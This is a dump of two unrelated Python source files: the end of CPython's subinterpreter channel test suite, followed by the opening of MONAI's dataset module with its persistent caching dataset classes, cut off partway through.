self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_channel_list_interpreters_invalid_channel(self):
cid = interpreters.channel_create()
# Test for invalid channel ID.
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_list_interpreters(1000, send=True)
interpreters.channel_close(cid)
# Test for a channel that has been closed.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
def test_channel_list_interpreters_invalid_args(self):
# Tests for invalid arguments passed to the API.
cid = interpreters.channel_create()
with self.assertRaises(TypeError):
interpreters.channel_list_interpreters(cid)
class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import convert_tables_to_dicts, first, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
The input data must be a list of file paths and will hash them as cache keys.
When loading persistent cache content, it can't guarantee the cached data matches current
transform chain, so please make sure to use exactly the same non-random transforms and the
args as the cache content, otherwise, it may cause unexpected errors.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(_item_transformed, temp_hash_file)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
